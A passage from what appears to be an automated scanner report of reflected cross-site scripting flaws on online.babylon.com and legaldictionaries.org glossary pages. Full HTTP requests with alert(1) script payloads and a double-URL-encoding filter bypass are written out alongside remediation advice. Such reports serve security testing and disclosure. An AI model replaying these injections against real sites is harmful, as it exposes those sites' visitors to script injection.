Referer: http://webcache.googleusercontent.com/search?q=cache:cyhBgjTvtJEJ:divorcelaw.legaldictionaries.org/Massachusetts-Divorce-Law-Dictionary/Abandonment+massachusetts+divorce+abandonment&cd=2&hl=en&ct=clnk&gl=us
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 29 Nov 2010 16:59:20 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 5416

<!-- version server --><!--old var isnt set -->
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
   <meta http-equiv="content-type" content="text/html;charset=UTF-8" />
   <t
...[SNIP]...
<input type="image" value="Term" src="http://affiliates.babylon.com/42/4100/458674d79"><script>alert(1)</script>8e268187563" alt="Translate with Babylon" title="Translate with Babylon" onClick="document.transbox._pressed.value=this.value;"/>
...[SNIP]...

1.58. http://online.babylon.com/trans_box/tbv2.php [default_keyword parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://online.babylon.com
Path:   /trans_box/tbv2.php

Issue detail

The value of the default_keyword request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 653c4'%3balert(1)//924551971a0 was submitted in the default_keyword parameter. This input was echoed as 653c4';alert(1)//924551971a0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /trans_box/tbv2.php?lang=EN&affiliate=CD4100&pic=http://affiliates.babylon.com/42/4100/4585&url=http://affiliates.babylon.com/z/4585/CD4100/&x=12&y=70&height=40&width=170&uri=&comma=EN,DE,ES,FR,HE,IT,JA,NL,PT,SR,ZHS,ZHT,KO,RU,SV,TR&bg_color=&but=http://affiliates.babylon.com/42/4100/4586&but_size=46&sbut_size=47&oldervar=0&showsearch=1&sbut=http://affiliates.babylon.com/42/4100/4587&default_keyword=653c4'%3balert(1)//924551971a0 HTTP/1.1
Host: online.babylon.com
Proxy-Connection: keep-alive
Referer: http://webcache.googleusercontent.com/search?q=cache:cyhBgjTvtJEJ:divorcelaw.legaldictionaries.org/Massachusetts-Divorce-Law-Dictionary/Abandonment+massachusetts+divorce+abandonment&cd=2&hl=en&ct=clnk&gl=us
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 29 Nov 2010 16:59:20 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 5486

<!-- version server --><!--old var isnt set -->
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
   <meta http-equiv="content-type" content="text/html;charset=UTF-8" />
   <t
...[SNIP]...
ue == 'doSearch') {
use_default_keyword = '1';
           //check if "translate" text.
           document.transbox.term.value=document.transbox.q.value;
           if(document.transbox.term.value == '653c4';alert(1)//924551971a0' && use_default_keyword != 'true')
           {    
            return false;
        }
           document.transbox.method="GET";
           var tl=document.getElementById("tl").value;
           tl=tl.toLowerCase();
           var uil=document.getElem
...[SNIP]...

1.59. http://online.babylon.com/trans_box/tbv2.php [default_keyword parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://online.babylon.com
Path:   /trans_box/tbv2.php

Issue detail

The value of the default_keyword request parameter is copied into a JavaScript inline comment. The payload 17ce5*/alert(1)//d6464732f3f was submitted in the default_keyword parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /trans_box/tbv2.php?lang=EN&affiliate=CD4100&pic=http://affiliates.babylon.com/42/4100/4585&url=http://affiliates.babylon.com/z/4585/CD4100/&x=12&y=70&height=40&width=170&uri=&comma=EN,DE,ES,FR,HE,IT,JA,NL,PT,SR,ZHS,ZHT,KO,RU,SV,TR&bg_color=&but=http://affiliates.babylon.com/42/4100/4586&but_size=46&sbut_size=47&oldervar=0&showsearch=1&sbut=http://affiliates.babylon.com/42/4100/4587&default_keyword=17ce5*/alert(1)//d6464732f3f HTTP/1.1
Host: online.babylon.com
Proxy-Connection: keep-alive
Referer: http://webcache.googleusercontent.com/search?q=cache:cyhBgjTvtJEJ:divorcelaw.legaldictionaries.org/Massachusetts-Divorce-Law-Dictionary/Abandonment+massachusetts+divorce+abandonment&cd=2&hl=en&ct=clnk&gl=us
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 29 Nov 2010 16:59:20 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 5486

<!-- version server --><!--old var isnt set -->
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
   <meta http-equiv="content-type" content="text/html;charset=UTF-8" />
   <t
...[SNIP]...
== 'Term')
{
document.transbox.action ="http://info.babylon.com/onlinebox.cgi";
document.transbox.term.value=document.transbox.q.value;
document.transbox.method="POST";
return validate('17ce5*/alert(1)//d6464732f3f','width=325,height=380');
}
return true;
} */

//if(document.transbox.q.value == "????...") return false;
       
       if(document.transbox._pressed.value == 'doSearch') {
use_defa
...[SNIP]...

1.60. http://online.babylon.com/trans_box/tbv2.php [default_keyword parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://online.babylon.com
Path:   /trans_box/tbv2.php

Issue detail

The value of the default_keyword request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 455a7"><script>alert(1)</script>25696edc6af was submitted in the default_keyword parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /trans_box/tbv2.php?lang=EN&affiliate=CD4100&pic=http://affiliates.babylon.com/42/4100/4585&url=http://affiliates.babylon.com/z/4585/CD4100/&x=12&y=70&height=40&width=170&uri=&comma=EN,DE,ES,FR,HE,IT,JA,NL,PT,SR,ZHS,ZHT,KO,RU,SV,TR&bg_color=&but=http://affiliates.babylon.com/42/4100/4586&but_size=46&sbut_size=47&oldervar=0&showsearch=1&sbut=http://affiliates.babylon.com/42/4100/4587&default_keyword=455a7"><script>alert(1)</script>25696edc6af HTTP/1.1
Host: online.babylon.com
Proxy-Connection: keep-alive
Referer: http://webcache.googleusercontent.com/search?q=cache:cyhBgjTvtJEJ:divorcelaw.legaldictionaries.org/Massachusetts-Divorce-Law-Dictionary/Abandonment+massachusetts+divorce+abandonment&cd=2&hl=en&ct=clnk&gl=us
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 29 Nov 2010 16:59:20 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 5591

<!-- version server --><!--old var isnt set -->
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
   <meta http-equiv="content-type" content="text/html;charset=UTF-8" />
   <t
...[SNIP]...
<input type="hidden" name="term" value="455a7"><script>alert(1)</script>25696edc6af" onfocus="if(this.value=='455a7">
...[SNIP]...

1.61. http://online.babylon.com/trans_box/tbv2.php [pic parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://online.babylon.com
Path:   /trans_box/tbv2.php

Issue detail

The value of the pic request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1f9c9"><script>alert(1)</script>3e7341fa6e6 was submitted in the pic parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /trans_box/tbv2.php?lang=EN&affiliate=CD4100&pic=http://affiliates.babylon.com/42/4100/45851f9c9"><script>alert(1)</script>3e7341fa6e6&url=http://affiliates.babylon.com/z/4585/CD4100/&x=12&y=70&height=40&width=170&uri=&comma=EN,DE,ES,FR,HE,IT,JA,NL,PT,SR,ZHS,ZHT,KO,RU,SV,TR&bg_color=&but=http://affiliates.babylon.com/42/4100/4586&but_size=46&sbut_size=47&oldervar=0&showsearch=1&sbut=http://affiliates.babylon.com/42/4100/4587&default_keyword= HTTP/1.1
Host: online.babylon.com
Proxy-Connection: keep-alive
Referer: http://webcache.googleusercontent.com/search?q=cache:cyhBgjTvtJEJ:divorcelaw.legaldictionaries.org/Massachusetts-Divorce-Law-Dictionary/Abandonment+massachusetts+divorce+abandonment&cd=2&hl=en&ct=clnk&gl=us
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 29 Nov 2010 16:59:18 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 5416

<!-- version server --><!--old var isnt set -->
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
   <meta http-equiv="content-type" content="text/html;charset=UTF-8" />
   <t
...[SNIP]...
<img src="http://affiliates.babylon.com/42/4100/45851f9c9"><script>alert(1)</script>3e7341fa6e6" border="0">
...[SNIP]...

1.62. http://online.babylon.com/trans_box/tbv2.php [sbut parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://online.babylon.com
Path:   /trans_box/tbv2.php

Issue detail

The value of the sbut request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 82995"><script>alert(1)</script>dbc362e9cd2 was submitted in the sbut parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /trans_box/tbv2.php?lang=EN&affiliate=CD4100&pic=http://affiliates.babylon.com/42/4100/4585&url=http://affiliates.babylon.com/z/4585/CD4100/&x=12&y=70&height=40&width=170&uri=&comma=EN,DE,ES,FR,HE,IT,JA,NL,PT,SR,ZHS,ZHT,KO,RU,SV,TR&bg_color=&but=http://affiliates.babylon.com/42/4100/4586&but_size=46&sbut_size=47&oldervar=0&showsearch=1&sbut=http://affiliates.babylon.com/42/4100/458782995"><script>alert(1)</script>dbc362e9cd2&default_keyword= HTTP/1.1
Host: online.babylon.com
Proxy-Connection: keep-alive
Referer: http://webcache.googleusercontent.com/search?q=cache:cyhBgjTvtJEJ:divorcelaw.legaldictionaries.org/Massachusetts-Divorce-Law-Dictionary/Abandonment+massachusetts+divorce+abandonment&cd=2&hl=en&ct=clnk&gl=us
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 29 Nov 2010 16:59:20 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 5416

<!-- version server --><!--old var isnt set -->
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
   <meta http-equiv="content-type" content="text/html;charset=UTF-8" />
   <t
...[SNIP]...
<INPUT TYPE="Image" src="http://affiliates.babylon.com/42/4100/458782995"><script>alert(1)</script>dbc362e9cd2" onclick="document.transbox._pressed.value=this.value;" Name="doSearch" VALUE="doSearch" >
...[SNIP]...

1.63. http://online.babylon.com/trans_box/tbv2.php [url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://online.babylon.com
Path:   /trans_box/tbv2.php

Issue detail

The value of the url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e75d1"><script>alert(1)</script>2528e5bf299 was submitted in the url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /trans_box/tbv2.php?lang=EN&affiliate=CD4100&pic=http://affiliates.babylon.com/42/4100/4585&url=http://affiliates.babylon.com/z/4585/CD4100/e75d1"><script>alert(1)</script>2528e5bf299&x=12&y=70&height=40&width=170&uri=&comma=EN,DE,ES,FR,HE,IT,JA,NL,PT,SR,ZHS,ZHT,KO,RU,SV,TR&bg_color=&but=http://affiliates.babylon.com/42/4100/4586&but_size=46&sbut_size=47&oldervar=0&showsearch=1&sbut=http://affiliates.babylon.com/42/4100/4587&default_keyword= HTTP/1.1
Host: online.babylon.com
Proxy-Connection: keep-alive
Referer: http://webcache.googleusercontent.com/search?q=cache:cyhBgjTvtJEJ:divorcelaw.legaldictionaries.org/Massachusetts-Divorce-Law-Dictionary/Abandonment+massachusetts+divorce+abandonment&cd=2&hl=en&ct=clnk&gl=us
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 29 Nov 2010 16:59:19 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 5416

<!-- version server --><!--old var isnt set -->
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
   <meta http-equiv="content-type" content="text/html;charset=UTF-8" />
   <t
...[SNIP]...
<a href="http://affiliates.babylon.com/z/4585/CD4100/e75d1"><script>alert(1)</script>2528e5bf299" target="_blank">
...[SNIP]...

1.64. http://online.babylon.com/trans_box/tbv2.php [x parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://online.babylon.com
Path:   /trans_box/tbv2.php

Issue detail

The value of the x request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload daf12"><script>alert(1)</script>dd39dcf0820 was submitted in the x parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /trans_box/tbv2.php?lang=EN&affiliate=CD4100&pic=http://affiliates.babylon.com/42/4100/4585&url=http://affiliates.babylon.com/z/4585/CD4100/&x=12daf12"><script>alert(1)</script>dd39dcf0820&y=70&height=40&width=170&uri=&comma=EN,DE,ES,FR,HE,IT,JA,NL,PT,SR,ZHS,ZHT,KO,RU,SV,TR&bg_color=&but=http://affiliates.babylon.com/42/4100/4586&but_size=46&sbut_size=47&oldervar=0&showsearch=1&sbut=http://affiliates.babylon.com/42/4100/4587&default_keyword= HTTP/1.1
Host: online.babylon.com
Proxy-Connection: keep-alive
Referer: http://webcache.googleusercontent.com/search?q=cache:cyhBgjTvtJEJ:divorcelaw.legaldictionaries.org/Massachusetts-Divorce-Law-Dictionary/Abandonment+massachusetts+divorce+abandonment&cd=2&hl=en&ct=clnk&gl=us
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 29 Nov 2010 16:59:19 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 5416

<!-- version server --><!--old var isnt set -->
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
   <meta http-equiv="content-type" content="text/html;charset=UTF-8" />
   <t
...[SNIP]...
<div style="position: absolute; text-align : center; width : 174px; height : 48px; top: 70px; left: 12daf12"><script>alert(1)</script>dd39dcf0820px; background : transparent">
...[SNIP]...

1.65. http://online.babylon.com/trans_box/tbv2.php [y parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://online.babylon.com
Path:   /trans_box/tbv2.php

Issue detail

The value of the y request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 59270"><script>alert(1)</script>44cb7c9e98c was submitted in the y parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /trans_box/tbv2.php?lang=EN&affiliate=CD4100&pic=http://affiliates.babylon.com/42/4100/4585&url=http://affiliates.babylon.com/z/4585/CD4100/&x=12&y=7059270"><script>alert(1)</script>44cb7c9e98c&height=40&width=170&uri=&comma=EN,DE,ES,FR,HE,IT,JA,NL,PT,SR,ZHS,ZHT,KO,RU,SV,TR&bg_color=&but=http://affiliates.babylon.com/42/4100/4586&but_size=46&sbut_size=47&oldervar=0&showsearch=1&sbut=http://affiliates.babylon.com/42/4100/4587&default_keyword= HTTP/1.1
Host: online.babylon.com
Proxy-Connection: keep-alive
Referer: http://webcache.googleusercontent.com/search?q=cache:cyhBgjTvtJEJ:divorcelaw.legaldictionaries.org/Massachusetts-Divorce-Law-Dictionary/Abandonment+massachusetts+divorce+abandonment&cd=2&hl=en&ct=clnk&gl=us
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 29 Nov 2010 16:59:19 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 5416

<!-- version server --><!--old var isnt set -->
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
   <meta http-equiv="content-type" content="text/html;charset=UTF-8" />
   <t
...[SNIP]...
<div style="position: absolute; text-align : center; width : 174px; height : 48px; top: 7059270"><script>alert(1)</script>44cb7c9e98cpx; left: 12px; background : transparent">
...[SNIP]...

1.66. http://patentandtrademark.legaldictionaries.org/European-Patent-Office-Glossary/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://patentandtrademark.legaldictionaries.org
Path:   /European-Patent-Office-Glossary/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 4bdd2%253cscript%253ealert%25281%2529%253c%252fscript%253e87c1e8e9144 was submitted in the REST URL parameter 1. This input was echoed as 4bdd2<script>alert(1)</script>87c1e8e9144 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /European-Patent-Office-Glossary4bdd2%253cscript%253ealert%25281%2529%253c%252fscript%253e87c1e8e9144/ HTTP/1.1
Host: patentandtrademark.legaldictionaries.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 29 Nov 2010 17:15:51 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Length: 23803

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
...[SNIP]...
</script>87c1e8e9144/">European Patent Office Glossary4bdd2<script>alert(1)</script>87c1e8e9144</a>
...[SNIP]...

1.67. http://patentandtrademark.legaldictionaries.org/European-Patent-Office-Glossary/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://patentandtrademark.legaldictionaries.org
Path:   /European-Patent-Office-Glossary/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d3d21%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1dfda9fcd91 was submitted in the REST URL parameter 1. This input was echoed as d3d21"><script>alert(1)</script>1dfda9fcd91 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /European-Patent-Office-Glossaryd3d21%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1dfda9fcd91/ HTTP/1.1
Host: patentandtrademark.legaldictionaries.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 29 Nov 2010 17:15:22 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Length: 24090

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
...[SNIP]...
<a href="/European-Patent-Office-Glossaryd3d21"><script>alert(1)</script>1dfda9fcd91/">
...[SNIP]...

1.68. http://patentandtrademark.legaldictionaries.org/European-Patent-Office-Glossary/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://patentandtrademark.legaldictionaries.org
Path:   /European-Patent-Office-Glossary/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as text between TITLE tags. The payload 59c01%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed2096a0e9c4 was submitted in the REST URL parameter 1. This input was echoed as 59c01</title><script>alert(1)</script>d2096a0e9c4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /European-Patent-Office-Glossary59c01%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed2096a0e9c4/ HTTP/1.1
Host: patentandtrademark.legaldictionaries.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 29 Nov 2010 17:16:32 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Length: 24399

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
...[SNIP]...
<title>European Patent Office Glossary59c01</title><script>alert(1)</script>d2096a0e9c4 Dictionary | Online Legal Dictionary</title>
...[SNIP]...

1.69. http://patentandtrademark.legaldictionaries.org/European-Patent-Office-Glossary/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://patentandtrademark.legaldictionaries.org
Path:   /European-Patent-Office-Glossary/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b4a3b%2527%253balert%25281%2529%252f%252f375cd4034da was submitted in the REST URL parameter 1. This input was echoed as b4a3b';alert(1)//375cd4034da in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /European-Patent-Office-Glossaryb4a3b%2527%253balert%25281%2529%252f%252f375cd4034da/ HTTP/1.1
Host: patentandtrademark.legaldictionaries.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 29 Nov 2010 17:15:34 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Length: 22757

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
...[SNIP]...
').term.value;
           }
           if (document.myform.operation[2] && document.myform.operation[2].checked == true) {
           var loc = 'http://patentandtrademark.legaldictionaries.org/European-Patent-Office-Glossaryb4a3b';alert(1)//375cd4034da/' + document.getElementById('define').term.value;
           }
       }
       var myExp = /\s/g;
       var loc2 = loc.replace(myExp,"_");
       location = loc2;
   }
   
   function bar(e){
       var keycode;
       if (window.event) keycod
...[SNIP]...

1.70. http://patentandtrademark.legaldictionaries.org/PATENTSCOPE-Glossary/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://patentandtrademark.legaldictionaries.org
Path:   /PATENTSCOPE-Glossary/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as text between TITLE tags. The payload 284c6%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0ce4d3ad6fb was submitted in the REST URL parameter 1. This input was echoed as 284c6</title><script>alert(1)</script>0ce4d3ad6fb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /PATENTSCOPE-Glossary284c6%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0ce4d3ad6fb/ HTTP/1.1
Host: patentandtrademark.legaldictionaries.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 29 Nov 2010 17:16:31 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Length: 23909

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
...[SNIP]...
<title>PATENTSCOPE Glossary284c6</title><script>alert(1)</script>0ce4d3ad6fb Dictionary | Free Online Legal Dictionary</title>
...[SNIP]...

1.71. http://patentandtrademark.legaldictionaries.org/PATENTSCOPE-Glossary/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://patentandtrademark.legaldictionaries.org
Path:   /PATENTSCOPE-Glossary/

Issue detail

